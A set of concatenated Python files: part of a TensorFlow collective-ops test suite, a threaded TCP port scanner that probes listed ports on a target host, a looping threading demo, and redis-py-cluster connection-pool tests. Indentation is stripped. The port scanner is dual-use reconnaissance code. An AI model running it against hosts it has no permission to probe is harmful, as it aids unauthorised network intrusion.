collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
if communication == 'NCCL':
self.skipTest('b/170672646: it crashes with NCCL and group size one')
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
if device == 'GPU':
self.skipTest('b/170980122')
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
if device == 'GPU':
self.skipTest('b/170980122')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
    # This timeout comes from param resolution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
if device == 'GPU':
self.skipTest('b/170980122')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def _setup_context():
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
python_port_scanner_threaded.py
|
#!/bin/python
"""
python_port_scanner_threaded.py
Purpose: Python-based TCP port scanner
Author: Cody Jackson
Date: 2/16/2018
########################
Version 0.1
Initial build
"""
import argparse
import socket
import threading
def connection_scan(target_ip, target_port):
"""Attempts to create a socket connection with the given IP address and port.
If successful, the port is open. If not, the port is closed.
"""
try:
conn_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn_socket.connect((target_ip, target_port))
conn_socket.send(b'Banner_query\r\n')
print("[+] {}/tcp open".format(target_port))
except OSError:
print("[-] {}/tcp closed".format(target_port))
finally:
conn_socket.close() # Ensure the connection is closed
def port_scan(target, port_num):
"""Scan indicated ports for status.
    It first resolves the IP address of the provided hostname, then starts a thread
    that calls connection_scan() for the given port.
"""
try:
target_ip = socket.gethostbyname(target)
except OSError:
print("[^] Cannot resolve {}: Unknown host".format(target))
return # Exit scan if target IP is not resolved
try:
target_name = socket.gethostbyaddr(target_ip)
print('[*] Scan Results for: {}'.format(target_name[0]))
except OSError:
print('[*] Scan Results for: {}'.format(target_ip))
    t = threading.Thread(target=connection_scan, args=(target_ip, int(port_num)))
t.start()
def argument_parser():
"""Allow user to specify target host and port."""
parser = argparse.ArgumentParser(description="TCP port scanner. Accepts a hostname/IP address and list of ports to "
"scan. Attempts to identify the service running on a port.")
parser.add_argument("-o", "--host", nargs="?", help="Host IP address")
parser.add_argument("-p", "--ports", nargs="?", help="Comma-separated port list, such as '25,80,8080'")
var_args = vars(parser.parse_args()) # Convert argument namespace to dictionary
return var_args
if __name__ == '__main__':
try:
user_args = argument_parser()
host = user_args["host"]
port_list = user_args["ports"].split(",") # Make a list from port numbers
for port in port_list:
port_scan(host, port)
except AttributeError:
        print("Error: please supply both the --host and --ports command-line arguments.")
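# A hypothetical invocation (host and ports here are illustrative only):
#
#   python python_port_scanner_threaded.py -o 192.168.0.10 -p 22,80,443
#
# Each port in the comma-separated list is handed to port_scan(), which starts
# one thread calling connection_scan() per port.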
|
thread_01.py
|
# thread_01.py
# To stop execution, press Ctrl+Break
import threading
import time
def client_thread(clientname, sec):
while True:
        print("{} - delay {}".format(clientname, sec))
time.sleep(sec)
clientA = threading.Thread(target=client_thread, args=("clientA", 0.1))
clientB = threading.Thread(target=client_thread, args=("clientB", 0.1))
clientC = threading.Thread(target=client_thread, args=("clientC", 2))
clientD = threading.Thread(target=client_thread, args=("clientD", 0.1))
clientE = threading.Thread(target=client_thread, args=("clientE", 0.1))
clientF = threading.Thread(target=client_thread, args=("clientF", 0.1))
clientG = threading.Thread(target=client_thread, args=("clientG", 0.1))
clientH = threading.Thread(target=client_thread, args=("clientH", 1))
clientA.start()
clientB.start()
clientC.start()
clientD.start()
clientE.start()
clientF.start()
clientG.start()
clientH.start()
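# The workers above loop forever and are non-daemonic, which is why the header
# comment suggests Ctrl+Break to stop the script. A minimal sketch of a
# stoppable variant, assuming a shared threading.Event (names below are
# illustrative, not part of the original):
#
#   stop_event = threading.Event()
#
#   def client_thread(clientname, sec):
#       while not stop_event.is_set():
#           print("{} - delay {}".format(clientname, sec))
#           time.sleep(sec)
#
#   # ... start the threads as above, then to shut down:
#   # stop_event.set()
#   # for t in (clientA, clientB, clientC, ...): t.join()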
|
test_cluster_connection_pool.py
|
# -*- coding: utf-8 -*-
# python std lib
import os
import re
import time
from threading import Thread
# rediscluster imports
from rediscluster.connection import (
ClusterConnectionPool, ClusterReadOnlyConnectionPool,
ClusterConnection, UnixDomainSocketConnection)
from rediscluster.exceptions import RedisClusterException
from tests.conftest import skip_if_server_version_lt
# 3rd party imports
import pytest
import redis
from mock import patch, Mock
from redis.connection import ssl_available, to_bool
from redis._compat import unicode
class DummyConnection(object):
description_format = "DummyConnection<>"
def __init__(self, host="localhost", port=7000, socket_timeout=None, **kwargs):
self.kwargs = kwargs
self.pid = os.getpid()
self.host = host
self.port = port
self.socket_timeout = socket_timeout
def get_pool(connection_kwargs=None, max_connections=None, max_connections_per_node=None, connection_class=DummyConnection, init_slot_cache=True):
connection_kwargs = connection_kwargs or {}
pool = ClusterConnectionPool(
connection_class=connection_class,
max_connections=max_connections,
max_connections_per_node=max_connections_per_node,
startup_nodes=[{"host": "127.0.0.1", "port": 7000}],
init_slot_cache=init_slot_cache,
**connection_kwargs)
return pool
class TestConnectionPool(object):
def get_pool(self, connection_kwargs=None, max_connections=None, max_connections_per_node=None,
connection_class=DummyConnection, init_slot_cache=True):
connection_kwargs = connection_kwargs or {}
pool = ClusterConnectionPool(
connection_class=connection_class,
max_connections=max_connections,
max_connections_per_node=max_connections_per_node,
startup_nodes=[{"host": "127.0.0.1", "port": 7000}],
init_slot_cache=init_slot_cache,
**connection_kwargs)
return pool
def test_in_use_not_exists(self):
"""
        Test that get_connection() still works when the node it fetches a connection
        for does not exist in the _in_use_connections mapping.
"""
pool = self.get_pool()
pool._in_use_connections = {}
pool.get_connection("pubsub", channel="foobar")
def test_connection_creation(self):
connection_kwargs = {'foo': 'bar', 'biz': 'baz'}
pool = self.get_pool(connection_kwargs=connection_kwargs)
connection = pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
assert isinstance(connection, DummyConnection)
assert connection.kwargs == connection_kwargs
def test_multiple_connections(self):
pool = self.get_pool()
c1 = pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
c2 = pool.get_connection_by_node({"host": "127.0.0.1", "port": 7001})
assert c1 != c2
def test_max_connections(self):
pool = self.get_pool(max_connections=2)
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7001})
with pytest.raises(RedisClusterException):
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
def test_max_connections_per_node(self):
pool = self.get_pool(max_connections=2, max_connections_per_node=True)
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7001})
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7001})
with pytest.raises(RedisClusterException):
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
def test_max_connections_default_setting(self):
pool = self.get_pool(max_connections=None)
assert pool.max_connections == 2 ** 31
def test_reuse_previously_released_connection(self):
pool = self.get_pool()
c1 = pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
pool.release(c1)
c2 = pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
assert c1 == c2
def test_repr_contains_db_info_tcp(self):
"""
        Note: init_slot_cache must be set to false otherwise it will try to
query the test server for data and then it can't be predicted reliably
"""
connection_kwargs = {'host': 'localhost', 'port': 7000}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=ClusterConnection,
init_slot_cache=False)
expected = 'ClusterConnectionPool<ClusterConnection<host=localhost,port=7000>>'
assert repr(pool) == expected
def test_repr_contains_db_info_unix(self):
"""
        Note: init_slot_cache must be set to false otherwise it will try to
query the test server for data and then it can't be predicted reliably
"""
connection_kwargs = {'path': '/abc', 'db': 1}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=UnixDomainSocketConnection,
init_slot_cache=False)
expected = 'ClusterConnectionPool<ClusterUnixDomainSocketConnection<path=/abc>>'
assert repr(pool) == expected
def test_get_connection_by_key(self):
"""
        This test assumes that the key 'foo', when hashed, maps to the node listening on port 7002
"""
pool = self.get_pool(connection_kwargs={})
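        # Background (not stated in the original source): Redis Cluster maps a key
        # to a slot via CRC16(key) % 16384; for "foo" that is slot 12182, which in
        # a default three-master test setup (slot ranges 0-5460, 5461-10922,
        # 10923-16383) belongs to the node listening on port 7002.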
# Patch the call that is made inside the method to allow control of the returned connection object
with patch.object(ClusterConnectionPool, 'get_connection_by_slot', autospec=True) as pool_mock:
def side_effect(self, *args, **kwargs):
return DummyConnection(port=1337)
pool_mock.side_effect = side_effect
connection = pool.get_connection_by_key("foo", 'GET')
assert connection.port == 1337
with pytest.raises(RedisClusterException) as ex:
pool.get_connection_by_key(None, None)
        assert unicode(ex.value).startswith("No way to dispatch this command to Redis Cluster.")
def test_get_connection_by_slot(self):
"""
        This test assumes that the keyslot operation on "foo" returns slot 12182
"""
pool = self.get_pool(connection_kwargs={})
# Patch the call that is made inside the method to allow control of the returned connection object
with patch.object(ClusterConnectionPool, 'get_connection_by_node', autospec=True) as pool_mock:
def side_effect(self, *args, **kwargs):
return DummyConnection(port=1337)
pool_mock.side_effect = side_effect
connection = pool.get_connection_by_slot(12182)
assert connection.port == 1337
m = Mock()
pool.get_random_connection = m
# If None value is provided then a random node should be tried/returned
pool.get_connection_by_slot(None)
m.assert_called_once_with()
def test_get_connection_blocked(self):
"""
Currently get_connection() should only be used by pubsub command.
All other commands should be blocked and exception raised.
"""
pool = self.get_pool()
with pytest.raises(RedisClusterException) as ex:
pool.get_connection("GET")
assert unicode(ex.value).startswith("Only 'pubsub' commands can be used by get_connection()")
def test_master_node_by_slot(self):
pool = self.get_pool(connection_kwargs={})
node = pool.get_master_node_by_slot(0)
        assert node['port'] == 7000
node = pool.get_master_node_by_slot(12182)
        assert node['port'] == 7002
class TestReadOnlyConnectionPool(object):
def get_pool(self, connection_kwargs=None, max_connections=None, init_slot_cache=True, startup_nodes=None):
startup_nodes = startup_nodes or [{'host': '127.0.0.1', 'port': 7000}]
connection_kwargs = connection_kwargs or {}
pool = ClusterReadOnlyConnectionPool(
init_slot_cache=init_slot_cache,
max_connections=max_connections,
startup_nodes=startup_nodes,
**connection_kwargs)
return pool
def test_repr_contains_db_info_readonly(self):
"""
Note: init_slot_cache must be set to false otherwise it will try to
query the test server for data and then it can't be predicted reliably
"""
pool = self.get_pool(
init_slot_cache=False,
startup_nodes=[{"host": "127.0.0.1", "port": 7000}, {"host": "127.0.0.2", "port": 7001}],
)
expected = 'ClusterReadOnlyConnectionPool<ClusterConnection<host=127.0.0.1,port=7000>, ClusterConnection<host=127.0.0.2,port=7001>>'
assert repr(pool) == expected
def test_max_connections(self):
pool = self.get_pool(max_connections=2)
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7001})
with pytest.raises(RedisClusterException):
pool.get_connection_by_node({"host": "127.0.0.1", "port": 7000})
    def test_get_connection_by_slot(self):
        """
        Master-only commands should be dispatched to a master connection for the
        slot; other commands may use a random master/slave connection for the slot.
        """
pool = self.get_pool(connection_kwargs={})
# Patch the call that is made inside the method to allow control of the returned connection object
with patch.object(ClusterReadOnlyConnectionPool, 'get_master_connection_by_slot', autospec=True) as pool_mock:
def side_effect(self, *args, **kwargs):
return DummyConnection(port=1337)
pool_mock.side_effect = side_effect
# Try a master only command
connection = pool.get_connection_by_key("foo", 'ZSCAN')
assert connection.port == 1337
with patch.object(ClusterReadOnlyConnectionPool, 'get_random_master_slave_connection_by_slot', autospec=True) as pool_mock:
def side_effect(self, *args, **kwargs):
return DummyConnection(port=1337)
pool_mock.side_effect = side_effect
# try a random node command
connection = pool.get_connection_by_key('foo', 'GET')
assert connection.port == 1337
with pytest.raises(RedisClusterException) as ex:
pool.get_connection_by_key(None, None)
        assert unicode(ex.value).startswith("No way to dispatch this command to Redis Cluster.")
def test_get_node_by_slot_random(self):
"""
We can randomly get all nodes in readonly mode.
"""
pool = self.get_pool(connection_kwargs={})
# Set the values that we expect to be set for the NodeManager. Represents 2 nodes for 1 specific slot
pool.nodes.slots[0] = [
{'host': '172.20.0.2', 'port': 7000, 'name': '172.20.0.2:7000', 'server_type': 'master'},
{'host': '172.20.0.2', 'port': 7003, 'name': '172.20.0.2:7003', 'server_type': 'slave'},
]
expected_ports = {7000, 7003}
actual_ports = set()
for _ in range(0, 100):
node = pool.get_node_by_slot_random(0)
actual_ports.add(node['port'])
assert actual_ports == expected_ports
@pytest.mark.xfail(reason="Blocking connection pool is not supported in this cluster client")
class TestBlockingConnectionPool(object):
def get_pool(self, connection_kwargs=None, max_connections=10, timeout=20):
connection_kwargs = connection_kwargs or {}
pool = redis.BlockingConnectionPool(connection_class=DummyConnection,
max_connections=max_connections,
timeout=timeout,
**connection_kwargs)
return pool
def test_connection_creation(self):
connection_kwargs = {'foo': 'bar', 'biz': 'baz'}
pool = self.get_pool(connection_kwargs=connection_kwargs)
connection = pool.get_connection('_')
assert isinstance(connection, DummyConnection)
assert connection.kwargs == connection_kwargs
def test_multiple_connections(self):
pool = self.get_pool()
c1 = pool.get_connection('_')
c2 = pool.get_connection('_')
assert c1 != c2
def test_connection_pool_blocks_until_timeout(self):
"When out of connections, block for timeout seconds, then raise"
pool = self.get_pool(max_connections=1, timeout=0.1)
pool.get_connection('_')
start = time.time()
with pytest.raises(redis.ConnectionError):
pool.get_connection('_')
# we should have waited at least 0.1 seconds
assert time.time() - start >= 0.1
def connection_pool_blocks_until_another_connection_released(self):
"""
When out of connections, block until another connection is released
to the pool
"""
pool = self.get_pool(max_connections=1, timeout=2)
c1 = pool.get_connection('_')
def target():
time.sleep(0.1)
pool.release(c1)
Thread(target=target).start()
start = time.time()
pool.get_connection('_')
assert time.time() - start >= 0.1
def test_reuse_previously_released_connection(self):
pool = self.get_pool()
c1 = pool.get_connection('_')
pool.release(c1)
c2 = pool.get_connection('_')
assert c1 == c2
def test_repr_contains_db_info_tcp(self):
pool = redis.ConnectionPool(host='localhost', port=6379, db=0)
expected = 'ConnectionPool<Connection<host=localhost,port=6379,db=0>>'
assert repr(pool) == expected
def test_repr_contains_db_info_unix(self):
pool = redis.ConnectionPool(
connection_class=redis.UnixDomainSocketConnection,
path='abc',
db=0,
)
expected = 'ConnectionPool<UnixDomainSocketConnection<path=abc,db=0>>'
assert repr(pool) == expected
class TestConnectionPoolURLParsing(object):
def test_defaults(self):
pool = redis.ConnectionPool.from_url('redis://localhost')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': None,
}
def test_hostname(self):
pool = redis.ConnectionPool.from_url('redis://myhost')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'myhost',
'port': 6379,
'db': 0,
'password': None,
}
def test_quoted_hostname(self):
pool = redis.ConnectionPool.from_url('redis://my %2F host %2B%3D+',
decode_components=True)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'my / host +=+',
'port': 6379,
'db': 0,
'password': None,
}
def test_port(self):
pool = redis.ConnectionPool.from_url('redis://localhost:6380')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6380,
'db': 0,
'password': None,
}
def test_password(self):
pool = redis.ConnectionPool.from_url('redis://:mypassword@localhost')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': 'mypassword',
}
def test_quoted_password(self):
pool = redis.ConnectionPool.from_url(
'redis://:%2Fmypass%2F%2B word%3D%24+@localhost',
decode_components=True)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': '/mypass/+ word=$+',
}
def test_quoted_path(self):
pool = redis.ConnectionPool.from_url(
'unix://:mypassword@/my%2Fpath%2Fto%2F..%2F+_%2B%3D%24ocket',
decode_components=True)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/my/path/to/../+_+=$ocket',
'db': 0,
'password': 'mypassword',
}
def test_db_as_argument(self):
pool = redis.ConnectionPool.from_url('redis://localhost', db='1')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 1,
'password': None,
}
def test_db_in_path(self):
pool = redis.ConnectionPool.from_url('redis://localhost/2', db='1')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 2,
'password': None,
}
def test_db_in_querystring(self):
pool = redis.ConnectionPool.from_url('redis://localhost/2?db=3',
db='1')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 3,
'password': None,
}
def test_extra_typed_querystring_options(self):
pool = redis.ConnectionPool.from_url(
'redis://localhost/2?socket_timeout=20&socket_connect_timeout=10'
'&socket_keepalive=&retry_on_timeout=Yes&max_connections=10'
)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 2,
'socket_timeout': 20.0,
'socket_connect_timeout': 10.0,
'retry_on_timeout': True,
'password': None,
}
assert pool.max_connections == 10
def test_boolean_parsing(self):
for expected, value in (
(None, None),
(None, ''),
(False, 0), (False, '0'),
(False, 'f'), (False, 'F'), (False, 'False'),
(False, 'n'), (False, 'N'), (False, 'No'),
(True, 1), (True, '1'),
(True, 'y'), (True, 'Y'), (True, 'Yes'),
):
assert expected is to_bool(value)
def test_extra_querystring_options(self):
pool = redis.ConnectionPool.from_url('redis://localhost?a=1&b=2')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': None,
'a': '1',
'b': '2'
}
def test_calling_from_subclass_returns_correct_instance(self):
pool = redis.BlockingConnectionPool.from_url('redis://localhost')
assert isinstance(pool, redis.BlockingConnectionPool)
def test_client_creates_connection_pool(self):
r = redis.Redis.from_url('redis://myhost')
assert r.connection_pool.connection_class == redis.Connection
assert r.connection_pool.connection_kwargs == {
'host': 'myhost',
'port': 6379,
'db': 0,
'password': None,
}
class TestConnectionPoolUnixSocketURLParsing(object):
def test_defaults(self):
pool = redis.ConnectionPool.from_url('unix:///socket')
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': None,
}
def test_password(self):
pool = redis.ConnectionPool.from_url('unix://:mypassword@/socket')
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': 'mypassword',
}
def test_db_as_argument(self):
pool = redis.ConnectionPool.from_url('unix:///socket', db=1)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 1,
'password': None,
}
def test_db_in_querystring(self):
pool = redis.ConnectionPool.from_url('unix:///socket?db=2', db=1)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 2,
'password': None,
}
def test_extra_querystring_options(self):
pool = redis.ConnectionPool.from_url('unix:///socket?a=1&b=2')
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': None,
'a': '1',
'b': '2'
}
class TestSSLConnectionURLParsing(object):
@pytest.mark.skipif(not ssl_available, reason="SSL not installed")
def test_defaults(self):
pool = redis.ConnectionPool.from_url('rediss://localhost')
assert pool.connection_class == redis.SSLConnection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': None,
}
@pytest.mark.skipif(not ssl_available, reason="SSL not installed")
def test_cert_reqs_options(self):
"""
rediss://[[username]:[password]]@localhost:6379/0
"""
import ssl
pool = get_pool().from_url('rediss://localhost:7000?ssl_cert_reqs=none')
assert pool.get_random_connection().cert_reqs == ssl.CERT_NONE
pool = get_pool().from_url('rediss://localhost:7000?ssl_cert_reqs=optional')
assert pool.get_random_connection().cert_reqs == ssl.CERT_OPTIONAL
pool = get_pool().from_url('rediss://localhost:7000?ssl_cert_reqs=required')
assert pool.get_random_connection().cert_reqs == ssl.CERT_REQUIRED
class TestConnection(object):
def test_on_connect_error(self):
"""
An error in Connection.on_connect should disconnect from the server
see for details: https://github.com/andymccurdy/redis-py/issues/368
"""
# this assumes the Redis server being tested against doesn't have
# 9999 databases ;)
bad_connection = redis.Redis(db=9999)
# an error should be raised on connect
with pytest.raises(redis.RedisError):
bad_connection.info()
pool = bad_connection.connection_pool
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt('2.8.8')
def test_busy_loading_disconnects_socket(self, r):
"""
If Redis raises a LOADING error, the connection should be
disconnected and a BusyLoadingError raised
"""
with pytest.raises(redis.BusyLoadingError):
r.execute_command('DEBUG', 'ERROR', 'LOADING fake message')
# TODO: Since we have to query the cluster before we send this DEBUG command,
# we will have more than one connection in our pool, so asserting exactly one
# connection will not work.
pool = r.connection_pool
assert len(pool._available_connections) >= 1
# assert not pool._available_connections[0]._sock
@pytest.mark.xfail(reason="pipeline NYI")
@skip_if_server_version_lt('2.8.8')
def test_busy_loading_from_pipeline_immediate_command(self, r):
"""
BusyLoadingErrors should raise from Pipelines that execute a
command immediately, like WATCH does.
"""
pipe = r.pipeline()
with pytest.raises(redis.BusyLoadingError):
pipe.immediate_execute_command('DEBUG', 'ERROR',
'LOADING fake message')
pool = r.connection_pool
assert not pipe.connection
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
